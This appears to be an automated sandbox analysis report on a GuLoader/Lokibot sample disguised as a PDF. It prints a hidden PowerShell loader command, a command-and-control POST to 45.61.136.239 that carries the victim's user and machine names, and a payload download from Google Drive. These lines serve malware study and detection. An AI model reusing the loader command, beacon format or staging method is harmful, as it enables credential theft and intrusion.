Jul 4, 2024 08:24:02.587217093 CEST	896	IN	Data Raw: 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 Data Ascii: order:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.wp-block-embe
Jul 4, 2024 08:24:02.587234020 CEST	1236	IN	Data Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
Jul 4, 2024 08:24:02.587245941 CEST	1236	IN	Data Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
Jul 4, 2024 08:24:02.587266922 CEST	448	IN	Data Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou
Jul 4, 2024 08:24:02.587615967 CEST	1236	IN	Data Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%
Jul 4, 2024 08:24:02.587626934 CEST	224	IN	Data Raw: 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 34 30 3a 20 31 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d Data Ascii: : 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.4	49763	45.61.136.239	80

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:24:04.224133968 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 149 Connection: close
Jul 4, 2024 08:24:04.229134083 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2C

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	216.58.212.142	443	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-04 06:22:42 UTC	216	OUT	GET /uc?export=download&id=1_n4h_rjLzWi6t1sW7yvUNQ7sooOdFYiY HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache
2024-07-04 06:22:42 UTC	1598	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 04 Jul 2024 06:22:42 GMT Location: https://drive.usercontent.google.com/download?id=1_n4h_rjLzWi6t1sW7yvUNQ7sooOdFYiY&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-cA49sIZ4iRtghb0_YzqLbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	142.250.185.97	443	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-04 06:22:43 UTC	258	OUT	GET /download?id=1_n4h_rjLzWi6t1sW7yvUNQ7sooOdFYiY&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-07-04 06:22:44 UTC	4832	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="EupaqWInNoXHd134.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 106560 Last-Modified: Tue, 02 Jul 2024 04:43:26 GMT X-GUploader-UploadID: ACJd0NrtZZtZr85TZqmQV7m1TGneStF0ISNAEapGCgPNDnJtJWMhz-u5Rkr7W13Vh_oEbzmHEIPNqYvd9A Date: Thu, 04 Jul 2024 06:22:44 GMT Expires: Thu, 04 Jul 2024 06:22:44 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=sdAQzw== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-04 06:22:44 UTC	4832	IN	Data Raw: 78 57 ed 0a fc fe 3f 03 68 03 28 e5 9b 0a 44 dc ed d2 90 6e d4 77 da 0f 78 98 94 c4 08 55 cc 75 00 31 ac 9a 0d 57 62 a7 46 ce 94 c6 99 6c a0 f4 dd 6d dc b3 b0 bc d2 f1 0f 6d 51 16 c9 13 4b 2d 0d bc ed 83 6e c5 b9 bb 75 93 d2 1c 58 6d ee 59 32 53 ae 0c e0 a2 4c 97 b0 59 5c 5f 89 4a fb 25 bc a4 39 4b e5 89 20 c7 ea 41 69 cc bf 24 cf 18 2b fc f0 14 a4 0e 89 6c a3 b4 e1 cd 98 8c f7 85 7e d5 ce e9 f7 14 64 df 5e 82 9a cf b3 37 58 a4 0a 13 e4 c9 1d 4b 73 89 3a 9a 3d fc 47 bd 52 84 18 f5 42 f0 10 67 47 21 c0 dd d0 88 12 e3 c3 48 c6 cc 74 1e 80 15 0b 9b 27 f8 5d a8 1e af 90 e0 2c 61 ad a3 16 3d b3 6e 76 ae 39 96 62 ef b4 1f ec d6 72 fe 74 3b 7b 5d a1 a0 42 b0 b5 d7 85 8c 96 35 8d 68 0a 88 55 7c 17 12 c5 5c fb 38 b6 39 40 0b a0 e2 3e 3d 83 e8 26 ea f9 a7 2b ae cb Data Ascii: xW?h(DnwxUu1WbFlmmQK-nuXmY2SLY\_J%9K Ai$+l~d^7XKs:=GRBgG!Ht'],a=nv9brt;{]B5hU\|\89@>=&+
2024-07-04 06:22:44 UTC	4832	IN	Data Raw: c3 5d 41 00 c5 bc 94 d2 5a d9 28 04 55 e7 0b a5 b4 a2 94 e8 d1 9b 7f 34 32 48 12 56 1e a1 26 5c 52 fd d1 64 8d 5d 4e 27 96 38 a0 83 59 47 18 64 94 fc 23 8b 1d b0 e1 bb 81 3a 16 09 b0 78 85 ca ec 7a b0 ad 35 44 ac 9a 2e 53 80 9b b4 cb e5 c6 97 85 54 f3 d2 90 ce 64 ac a4 a7 99 d4 66 42 5b 66 c7 4b f9 71 87 17 47 66 8c 88 d5 cb 53 4b 53 6f 29 93 50 cc 83 3c 73 4a 9b 52 c6 dd 02 73 50 f7 df fe 38 25 01 e7 d1 db 20 7a 01 2e 1a c9 75 1f 72 8b ae 6d 5b 36 d4 e4 cc 18 66 42 39 0a 3a 98 3d 5d 6f 9d 2b a4 06 a7 fb 29 a6 b5 73 91 64 9b 22 65 7c d9 4a 6c 9b 84 71 69 c7 9e 6f 32 07 66 41 f6 b3 46 09 1e 75 c7 29 af c6 65 cb 7e 50 d6 35 ca 31 9d 2a 6b 63 1b ef 96 8b d6 d3 45 6a a2 63 65 c4 ac fb 46 71 8c 1a b3 8d 3e 11 41 e3 d9 66 11 6c d2 04 cf bc 0c a7 be 81 a1 81 b9 Data Ascii: ]AZ(U42HV&\Rd]N'8YGd#:xz5D.STdfB[fKqGfSKSo)P<sJRsP8% z.urm[6fB9:=]o+)sd"e\|Jlqio2fAFu)e~P51*kcEjceFq>Afl
2024-07-04 06:22:44 UTC	202	IN	Data Raw: 4f 25 a7 e1 a3 6a 9f d0 73 0a 96 ed 31 58 f3 a4 d8 2d 5b 55 81 04 cd c7 2e c7 22 97 f1 8d 31 b1 1d ef da 4f c9 f4 9b 2d 43 be f4 6c 90 06 65 f3 09 61 c9 8f 84 57 d9 90 c8 fb b3 0a 43 20 45 ac 50 39 5e 1d 22 c3 29 ab ef 3a 7c ed c9 16 1c 73 92 43 34 d4 a5 c2 11 e9 8b bd 85 a5 13 89 11 9f bf 3a ec 9c de f0 70 e1 15 ff 15 b5 d0 8d c0 85 60 42 4d f7 0b 34 21 e1 8c 11 2e b2 3e b3 6b e6 1f 19 8b b7 bd 5c 8b 1e 9f db 26 35 05 2a cc e7 34 30 2d 00 89 ac 88 40 b5 2a 74 1b c1 b3 dd d3 3d 18 af 87 7f 83 a8 f2 47 47 20 a7 1c 1d 39 fd ff 19 87 9e 59 75 61 99 e1 02 3c da 73 1f f8 15 2b 6b 6a d9 b6 eb 6f 28 00 0d Data Ascii: O%js1X-[U."1O-CleaWC EP9^"):\|sC4:p`BM4!.>k\&540-@t=GG 9Yua<s+kjo(
2024-07-04 06:22:44 UTC	1322	IN	Data Raw: fa 9e f4 43 49 ae 16 c9 3b b4 b7 1e c0 70 ee 47 76 e9 41 c4 5f ec 65 56 58 53 4b 40 21 49 ca 9d ea 34 a4 94 81 a8 d9 11 34 f7 6a 35 80 2e d4 d6 25 b8 bb 71 a0 2d 4f 2e af fa f9 cb 53 46 fc 18 5d b3 a4 06 fa 48 ff c8 4a bd 7c 39 64 4d 59 8f f1 77 97 63 74 49 6c fe 24 27 be d3 03 0f 97 60 02 da e5 9e ac 41 8c 68 64 32 7d 8f 35 d7 ff 57 e1 6d 4b fa fa ef 97 14 6e 5b 9c ea 55 e4 19 2e 24 fc 85 a3 08 e2 1c e2 df d7 ed e7 e0 00 35 71 15 6d 14 6b 72 e0 6b 03 27 7c 35 42 96 e9 84 51 4d 8d 7d 80 14 2d 25 5b 67 c6 b7 8a a1 8c e3 fe c1 e4 c3 73 7f e7 c8 4f 29 af eb 3d 64 42 ed 65 c7 2c f0 67 7e 99 ee 9a 1d 36 c9 10 bf 94 c5 08 51 4b 5a d2 76 de f1 5a 94 a0 1f 18 fe ef ca 60 e5 ac 76 6e bb 85 7e 8f 81 a0 54 9d 47 a4 4f 49 83 82 1b aa fe 51 fc 18 93 cb 23 42 4f 21 03 Data Ascii: CI;pGvA_eVXSK@!I44j5.%q-O.SF]HJ\|9dMYwctIl$'`Ahd2}5WmKn[U.$5qmkrk'\|5BQM}-%[gsO)=dBe,g~6QKZvZ`vn~TGOIQ#BO!
2024-07-04 06:22:44 UTC	1390	IN	Data Raw: ec c0 51 40 c1 7d 1e 8a 8c 51 93 60 79 a4 9b 22 74 12 84 54 8f ae 35 11 5e 86 48 9e 56 11 9b de b5 fd 4a bc fa 79 f7 7f 08 1d 51 32 39 07 49 5a 1a 7c 57 1a 2f 9c e3 a8 32 88 67 4f a0 38 43 05 83 a2 80 aa e0 42 ab e9 01 f0 8f b3 5c 3a b3 85 13 98 56 92 11 de 4d fe d4 01 ca ef a2 af b0 77 28 dd b9 90 19 a5 79 e7 f6 1c 22 28 a0 6e 9f 22 f5 4e 8b 6d 25 27 1d 58 69 34 73 cd ad ce 1c e6 1d 61 a2 b4 5b f0 8d 4d 71 60 a2 21 9e ea 13 0f 33 fc 2e 6a a2 e5 1f 8a 52 3d 3a bb 25 15 22 92 67 e6 d1 61 2a b3 2b 31 1d 6d 5e 1d 30 61 2d ca 1f 1c 72 4e 14 09 5b 1e 40 59 ea 8c 56 a2 cf 9b 80 57 e3 7c 51 43 c7 b9 67 17 65 85 3e 5e 00 7e ac d4 8a 2a de a2 03 bd de 0c 46 87 f0 4b 76 c4 87 db ff f7 1e 37 c5 75 c3 62 53 4c af 7f dc 6c 64 7b bb e7 91 bb b3 0a fb f4 14 80 e0 f4 ec Data Ascii: Q@}Q`y"tT5^HVJyQ29IZ\|W/2gO8CB\:VMw(y"(n"Nm%'Xi4sa[Mq`!3.jR=:%"ga+1m^0a-rN[@YVW\|QCge>^~FKv7ubSLld{
2024-07-04 06:22:44 UTC	1390	IN	Data Raw: bf fc 56 e7 5d f7 7b 45 7b 8e 64 5e 99 36 89 a7 a0 12 24 6b 3b 3c 22 d7 ab d5 a4 b7 ac 08 c2 36 42 6f 7a 5b d1 69 fa 65 3a 4c 71 41 35 d1 b2 69 ff 6c b3 0c 1a 71 29 1c fc 78 44 d6 bc 0e 66 69 f1 ba 40 d6 5c f6 af 80 75 f9 38 28 af e4 dc e6 4e a0 5f df 9b e6 34 f2 c6 be e7 fe 35 c7 61 f2 82 65 c6 a0 e7 5f 17 c7 87 9e 20 dc 86 0c 72 4b 21 27 07 80 12 2f ff 18 d6 40 e0 b4 8d ea 3e 17 91 24 97 01 82 33 05 64 a8 f1 e9 0c 19 c9 e1 66 c4 d1 ad 0d 50 3c 6c 40 b3 dc 8c ed bb fe ff ff ea 25 f3 25 5a 79 9a c6 76 59 43 cf 15 3c a0 3c f4 5e 57 77 80 da 4d a5 cd 2d 84 1e ea c4 ad 78 85 c4 e3 56 a4 11 af 6f 6c 10 69 d8 0e dc e3 a3 0f 00 62 02 56 90 35 8c ae 68 de d6 9c 30 0f dd 98 d5 12 53 e4 61 a0 2c 63 86 0a 2d 7e 2a 34 2e 82 c7 ba 83 3d cb 0d 8a f7 6b 4b 73 8d 4d 3e Data Ascii: V]{E{d^6$k;<"6Boz[ie:LqA5ilq)xDfi@\u8(N_45ae_ rK!'/@>$3dfP<l@%%ZyvYC<<^WwM-xVolibV5h0Sa,c-~*4.=kKsM>
2024-07-04 06:22:44 UTC	1390	IN	Data Raw: 07 04 f1 95 68 7b c0 b6 fa bd c9 f6 74 68 a9 f4 ea af d4 15 bc f4 e4 92 77 eb ac 88 9f 05 fc bb 42 09 4b c0 ab a0 e1 44 cb 1f 20 de e7 16 5a c6 13 f6 a1 20 fc ce 1c 0d 6d e6 a7 e4 7e 6a ba cf 38 5a 0a a2 fd a8 50 62 f1 72 8a 68 06 08 ab ab a3 1c 49 63 e2 bf 12 03 e6 8f 04 9a 30 77 fc 03 d3 6b df 93 66 e9 a6 02 ab 38 c1 68 3b 08 df d4 ab 9a e3 46 8d 2d 12 af f2 bc aa 58 97 9f f2 f2 e8 48 b2 59 18 b4 e3 f2 e3 16 b3 7a 6e 1c af 59 78 1e 22 d5 f5 52 1f 48 75 10 7f 4f 14 e3 80 f7 ef 7a 4d a8 34 18 8e 54 1e 61 78 c2 12 1b 63 ae 0c ab f1 dc 24 86 79 4c e1 bf 25 6e ce 3e 4b b8 b8 a4 2a 6b 83 32 da f9 c6 ca 7d e7 47 63 5e ee c7 34 32 c6 0d d6 db 2a 8b 99 2c e6 42 75 ae 96 ee 2b bf 20 52 18 7e ba 00 33 b4 19 24 3a db 60 a5 0c 1a 6f 79 28 91 98 52 71 3d f0 1a 40 57 Data Ascii: h{thwBKD Z m~j8ZPbrhIc0wkf8h;F-XHYznYx"RHuOzM4Taxc$yL%n>Kk2}Gc^42,Bu+ R~3$:`oy(Rq=@W
2024-07-04 06:22:44 UTC	1390	IN	Data Raw: f1 be d7 67 fa 0b 4c 39 4f 8c 14 0b a2 f0 3b d1 d6 c5 63 e6 e1 a3 f7 23 ba b1 db c1 b6 2d 29 10 fd 00 94 95 ca d9 5e e1 4f 14 9d 96 29 52 80 4f e6 e3 36 ed a3 69 66 70 79 e6 c3 92 d4 d7 22 82 5d c8 15 2c 66 6f 26 e4 db 91 3b a0 85 f5 83 31 a1 8e 29 ce 80 10 a2 a5 76 29 6a 2e ac 72 c4 d6 21 b5 a7 f6 0a 65 51 7c 26 19 3a d4 ff c2 80 23 c1 01 22 00 6b 6f 99 e1 cc 00 ea 64 40 d5 0f 01 03 b1 27 69 1f 37 44 b0 96 c4 57 03 42 75 6a 4d 66 52 c4 ec 4e c2 f4 1e c0 61 77 64 d1 ae a2 b8 eb cc a8 4f 27 f6 dc 8e 1e 8e 44 2e 59 e3 3a 18 bd d7 16 11 a0 e4 52 7f 40 7c b6 47 9b 74 c5 df d4 c6 7b a8 9b de a3 1b 11 b0 9e 4c 72 70 2d 9a c9 f1 75 46 a5 83 bf a4 1e a9 b9 08 c1 d0 67 55 bd 5b d1 49 2d 5f 80 b9 21 3e f7 c5 5b 2e 11 12 49 3c 79 4f 2b 31 67 9f b7 ac bf 9d 2c 43 ca Data Ascii: gL9O;c#-)^O)RO6ifpy"],fo&;1)v)j.r!eQ\|&:#"kod@'i7DWBujMfRNawdO'D.Y:R@\|Gt{Lrp-uFgU[I-_!>[.I<yO+1g,C
2024-07-04 06:22:44 UTC	1390	IN	Data Raw: 63 02 56 b8 fb f1 40 87 54 20 b8 4a 2a 89 fc f1 9f ee 8b 06 45 09 67 f1 3c b7 2b d0 25 35 57 88 5d 81 ff 6d 23 75 1c 4d dd 0b 94 66 f3 eb 2c 54 5b 14 e9 cc 18 66 7b 37 8c f1 c7 b9 9d 1b 0c 80 f5 32 d3 08 2d 5d c0 7f 42 4e 20 8f 19 40 24 6c 1b b3 af ff 1b 74 39 97 77 73 9b 41 cb b6 46 09 c6 d9 fa c7 6b 7d 18 8b e5 00 f2 01 f2 ba 04 92 b9 9d 0c ed e8 31 d1 d5 d0 1d b7 07 8a d4 00 78 8a 99 62 b8 c5 37 ed 82 27 56 d3 eb ee 51 a6 4f ca 59 8b 8c 9b ed 1b 8b b9 7d 41 db 27 9f ee 1f 69 ca e0 15 c5 ae d6 ac 54 9b 4a 9c 67 15 77 21 54 65 d4 dd ad 38 e4 1b 74 a4 87 eb c0 e5 08 74 fa 53 72 53 28 82 24 e4 ca b0 69 f0 0c 17 6e 53 04 87 be 98 b7 8d 14 c6 cf d7 35 65 a5 e7 f3 50 b9 5b 16 28 8e bd cf 3d d7 c2 a0 c5 f9 08 16 7e 92 09 6a 9e 69 93 75 ac 15 1a 33 b9 0b 6e 0c Data Ascii: cV@T J*Eg<+%5W]m#uMf,T[f{72-]BN @$lt9wsAFk}1xb7'VQOY}A'iTJgw!Te8ttSrS($inS5eP[(=~jiu3n
2024-07-04 06:22:44 UTC	1390	IN	Data Raw: 04 4a 24 9b 24 c7 05 fd ad a4 b3 78 ad 8a e5 a1 8f 3e d4 28 19 1a 58 f8 e3 38 04 20 51 cb a1 fd 48 ac 6b 6d b0 a8 3f eb b3 7a 59 f5 5d 5e fd 32 c4 08 f7 14 12 02 8f a0 77 0c bf 1c 23 a6 2d 93 71 54 8b 63 c9 af b2 41 d1 8b 57 5d 09 f6 6d 7b 30 14 b2 bc 05 be fe ea 0a 1f 63 ef 31 c9 26 1d 28 12 e6 2e 03 ca 38 6a db 8a 52 e1 20 c2 a4 40 46 1d 58 67 ae 34 d2 49 d5 87 bc 5d a7 b3 ad c4 11 75 67 57 65 a2 42 63 fa 04 e2 14 73 ab a2 c1 c3 1c 68 ce f4 02 14 01 b7 7b 34 4d 5b e7 b5 d4 11 53 ff 77 64 38 20 ae a7 06 f4 57 cb 71 f5 e0 a9 c8 a6 59 6e c2 99 9a 29 c8 ed 59 c1 c6 f4 5a 87 a0 ce 83 01 c2 99 d2 64 b2 eb 35 77 5a cb 30 f1 f2 3c 8e 39 a3 aa 65 0c d8 7a c4 3d 54 17 f8 aa 5b c5 6f aa da e8 3d ee 57 e1 59 8f f8 4c 28 86 e3 a6 16 62 73 45 ae 4a 6f 72 5b 5c 20 24 Data Ascii: J$$x>(X8 QHkm?zY]^2w#-qTcAW]m{0c1&(.8jR @FXg4I]ugWeBcsh{4M[Swd8 WqYn)YZd5wZ0<9ez=T[o=WYL(bsEJor[\ $

Target ID:	0
Start time:	02:21:56
Start date:	04/07/2024
Path:	C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe"
Imagebase:	0x400000
File size:	484'816 bytes
MD5 hash:	33BC360990C66BEEA144AE48D17504A6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:22:00
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)"
Imagebase:	0xa80000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2150551210.0000000009A8F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:22:00
Start date:	04/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:22:37
Start date:	04/07/2024
Path:	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Slringsnettets.exe"
Imagebase:	0x400000
File size:	484'816 bytes
MD5 hash:	33BC360990C66BEEA144AE48D17504A6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000006.00000002.2902321188.00000000032F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 24%, ReversingLabs Detection: 23%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	21.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23.2%
Total number of Nodes:	1287
Total number of Limit Nodes:	39

Executed Functions

Function 004030D9 Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 357
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004030FE
GetVersion.KERNEL32 ref: 00403104
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040312D
#17.COMCTL32(00000007,00000009), ref: 0040314F
OleInitialize.OLE32(00000000), ref: 00403156
SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,00000160,00000000), ref: 00403172
GetCommandLineA.KERNEL32(00422F00,NSIS Error), ref: 00403187
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe",00000000), ref: 0040319A
CharNextA.USER32(00000000,"C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe",00000020), ref: 004031C5
GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032C2
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032D3
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032DF
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032F3
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004032FB
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040330C
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403314
DeleteFileA.KERNELBASE(1033), ref: 00403328

Part of subcall function 00406092: GetModuleHandleA.KERNEL32(?,?,?,00403143,00000009), ref: 004060A4
Part of subcall function 00406092: GetProcAddress.KERNEL32(00000000,?), ref: 004060BF

OleUninitialize.OLE32(?), ref: 004033D6
ExitProcess.KERNEL32 ref: 004033F7
